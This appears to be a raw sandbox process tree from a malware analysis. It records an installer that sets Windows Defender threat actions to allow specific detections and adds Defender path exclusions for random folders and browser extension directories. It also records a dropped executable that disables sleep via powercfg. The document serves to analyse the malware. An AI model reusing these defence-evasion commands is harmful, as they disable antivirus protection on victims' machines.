    "C:\Program Files (x86)\AVG\Browser\Update\Install\{7E7A4DF1-920E-4C8F-A68E-17FA2510DE71}\CR_7B816.tmp\setup.exe" --install-archive="C:\Program Files (x86)\AVG\Browser\Update\Install\{7E7A4DF1-920E-4C8F-A68E-17FA2510DE71}\CR_7B816.tmp\SECURE.PACKED.7Z" --chrome --do-not-launch-chrome --hide-browser-override --show-developer-mode --suppress-first-run-bubbles --default-search-id=3 --default-search=bing.com --adblock-mode-default=0 --no-create-user-shortcuts --make-chrome-default --force-default-win10 --auto-import-data=msedge --import-cookies --auto-launch-chrome --system-level
    3⤵
    PID:5084
  - - C:\Program Files (x86)\AVG\Browser\Update\Install\{7E7A4DF1-920E-4C8F-A68E-17FA2510DE71}\CR_7B816.tmp\setup.exe
      "C:\Program Files (x86)\AVG\Browser\Update\Install\{7E7A4DF1-920E-4C8F-A68E-17FA2510DE71}\CR_7B816.tmp\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\Crashpad" --url=fake_url --annotation=plat=Win64 --annotation=prod=AVG --annotation=ver=125.0.25186.78 --initial-client-data=0x260,0x264,0x268,0x23c,0x26c,0x7ff755865390,0x7ff75586539c,0x7ff7558653a8
      4⤵
      PID:1120

C:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exe
C:\ProgramData\qhbnnmvggfhr\bkqtzupkspiy.exe
1⤵
PID:2676
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  PID:4820
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  PID:3452
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  PID:4796
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  PID:4736
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:4320
- C:\Windows\system32\svchost.exe
  svchost.exe
  2⤵
  PID:1956

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:5872

C:\Users\Admin\AppData\Local\Temp\7zS9C17.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zS9C17.tmp\Install.exe FN /wPUdidGZwD 525403 /S
1⤵
PID:2976
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
  2⤵
  PID:6000
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
    3⤵
    PID:2684
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
      4⤵
      PID:4760
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
        5⤵
        
        PID:3448
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
    3⤵
    PID:5612
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
      4⤵
      PID:5796
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
        5⤵
        
        PID:4748
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
    3⤵
    PID:5960
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
      4⤵
      PID:4452
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
        5⤵
        
        PID:3336
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
    3⤵
    PID:3480
  - - C:\Windows\SysWOW64\cmd.exe
      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
      4⤵
      PID:3680
    - - \??\c:\windows\SysWOW64\reg.exe
        
        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
        5⤵
        
        PID:2076
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
    3⤵
    PID:5908
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
      4⤵
      PID:5352
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell start-process -WindowStyle Hidden gpupdate.exe /force
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1752
      - C:\Windows\SysWOW64\gpupdate.exe
        
        "C:\Windows\system32\gpupdate.exe" /force
        6⤵
        
        PID:5144
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:3100
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3016
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:1032
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4116
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3544
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1756
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2644
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2476
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:4528
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1268
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2008
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4924
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3584
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5708
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:6012
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3396
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1924
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2940
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5984
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:680
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:3552
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1768
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1120
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4268
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5756
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:5440
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:5204
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1840
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1852
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4288
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AClHKqYMJaBBC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AClHKqYMJaBBC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RFIumDCEBXXU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RFIumDCEBXXU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ijLlchIpU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ijLlchIpU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vEcQBTYFTXUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\vEcQBTYFTXUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xSxYkcSdbazbYzGpZTR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xSxYkcSdbazbYzGpZTR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\oBeyQrPqBvPiiLVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\oBeyQrPqBvPiiLVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\LYuMxsVXDPHoztkCT\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\LYuMxsVXDPHoztkCT\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\gLbKcqvTyliDAKYm\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\gLbKcqvTyliDAKYm\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  PID:5780
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AClHKqYMJaBBC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1072
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AClHKqYMJaBBC" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:5804
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AClHKqYMJaBBC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1144
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RFIumDCEBXXU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5736
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RFIumDCEBXXU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:184
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ijLlchIpU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5576
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ijLlchIpU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5680
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vEcQBTYFTXUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3372
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vEcQBTYFTXUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4400
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xSxYkcSdbazbYzGpZTR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5716
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xSxYkcSdbazbYzGpZTR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:3716
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\oBeyQrPqBvPiiLVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:4812
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\oBeyQrPqBvPiiLVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5336
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:636
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:1192
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:1588
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5644
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\LYuMxsVXDPHoztkCT /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5672
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\LYuMxsVXDPHoztkCT /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:400
- - C:\Windows\SysWOW64\reg.exe
